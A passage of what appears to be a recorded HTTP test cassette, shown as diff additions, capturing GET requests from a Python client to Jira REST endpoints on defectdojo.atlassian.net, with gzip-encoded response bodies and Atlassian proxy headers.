fw1ApLRTFkWOVz9M6twLNPwwDVTazgxH/vSJSm3nOlYwG1O9yopbHzAyarNdWRb0Ryd+7V6HXqAX + 1aUQOmcSBCmP5axJNQ0XO+GfQKwhv3aV4wV68FNOhBi98yZF30WTBmdLgV+1hSWDICLw0K8yJ7ou + fvFEB49SBnFLk2dAfouQWGPqqmkh/TExIsDEXoJEz+vSovLupKzi5+KNhYZcN1X/lw1PSNKERvwc + hHpSFz8sKRkSRtqAvVJvvirlCxrMbDl8iVY1vsuEjrthBnO1WSB8qSsJEIEWETumhUVGtsu2+9Z8 + wA8+9tlodN+rseWs3/22roXqJHCuksCgQVhfTVHKeKLmbCD/AAAA//8iMiDBQ79QO0BUNIjAXgvh + Dc4SoLZiq6JcXTADdf0LSAgjxHCPAhvgHAUGy0BDzL8oPTEvswocRTjGgdGV0CoMwSPBqJZhDT/0 + pZOI6Yh8JM24wxh5PgJJsy6SbgAAAAD//8RcwQ6CMAz9FY56MOEXjHow8eBFL8YDCYSYCCMi3Ph3 + 2WjXjbVqCMYbXYG+92pYV4YOTxRabhvHYtvYeEDoddU/O/TmBV5k1z27wO7N7fHl1AsRHU1rKlqY + rfR9NRXpZ3m91KmAtEi7dUdpgDlA0PybwspA0Lfh22Wx3ISOxSa08UAG9kWVmEUpI7/1za49qGja + zzbKcPC/hbjTos7K9vZQpbcY9MdAvp03iJjCyXiqUG5QTo6wdHWvIEJp4/9FB9lAZNtk4+XLfCxS + swEAY3I8ILRlgecSg6BECiuj35ZFFJAjwBVIXF2kCu9HRTZw2NgBmUKQBjjlYx4wGkcAfPWqSnIv + FXgRkWjVM6M8oAUEzmDK8KdnYAjFoUcQFvUwQJj1R7Z3Re+byAbcB5VH+svgt9CnKs9BHs8VhMiS + wKGuu74AAAD//wMANYTZQH1HAAA= + headers: + ATL-TraceId: + - ee7c4bd5061b770a + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:45:24 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + content-encoding: + - gzip + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + vary: + - Accept-Encoding + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - f6a477d2-60d6-4b3d-9934-8be191dd5db9 + x-envoy-upstream-service-time: + - '53' + status: + code: 200 + message: OK +- request: + body: null + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: GET + uri: https://defectdojo.atlassian.net/rest/agile/1.0/epic/NTEST-462/issue + response: + body: + string: !!binary | + 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 + headers: + ATL-TraceId: + - 38a7b181fc515e82 + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:45:24 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + content-encoding: + - gzip + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + vary: + - Accept-Encoding + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - 89b0d109-7cfd-438c-8475-7c36e127120b + x-envoy-upstream-service-time: + - '306' + status: + code: 200 + message: OK +- request: + body: null + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: GET + uri: https://defectdojo.atlassian.net/rest/api/2/serverInfo + response: + body: + string: !!binary | + H4sIAAAAAAAAA0yPT0vEMBDFv0uuttlJmv7LTfSgIqvQ7klE0naClbQpTSosy353E1xcb/Pe/N48 + 5kQ65fCwGiLJp/eLk7vdgBp7P9gvS5U3yrlRzXRGTxLyjasb7RxgBsAoUEib/e1r8/DSXrf7berC + RORbhBJI4D0hAy7GHiecfXtcMBy4M3YbQqjbRjP8RoiMgVxczHvlI8iBsxR4youWMclLmQkKADcQ + 4JB3uIbedpyubJYCazlIkUsuaJFVf2w/Pc7aBlAUeV5qpjWiqOpaKxE1KlbyIq94EDzv66L+V+BN + bHgaV0XiO1ptxj/bXkX7RMxlIjh/HBpyPv8AAAD//wMAdr3Z7loBAAA= + headers: + ATL-TraceId: + - a5741abe4425118e + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:45:24 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + content-encoding: + - gzip + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + vary: + - Accept-Encoding + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - cd4c0191-c131-4d5d-9701-b0f09794e07e + x-envoy-upstream-service-time: + - '32' + status: + code: 200 + message: OK +- request: + body: null + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: GET + uri: https://defectdojo.atlassian.net/rest/api/2/field + response: + body: + string: !!binary | + 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 + wKGuu74AAAD//wMANYTZQH1HAAA= + headers: + ATL-TraceId: + - 1a5129a03cf28df2 + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:45:24 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + content-encoding: + - gzip + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + vary: + - Accept-Encoding + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - 2b734974-2046-4b9d-a080-4362f549af3b + x-envoy-upstream-service-time: + - '83' + status: + code: 200 + message: OK +- request: + body: null + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: GET + uri: https://defectdojo.atlassian.net/rest/api/2/field + response: + body: + string: !!binary | + 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 + wKGuu74AAAD//wMANYTZQH1HAAA= + headers: + ATL-TraceId: + - 4950b193581d9850 + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:45:24 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + 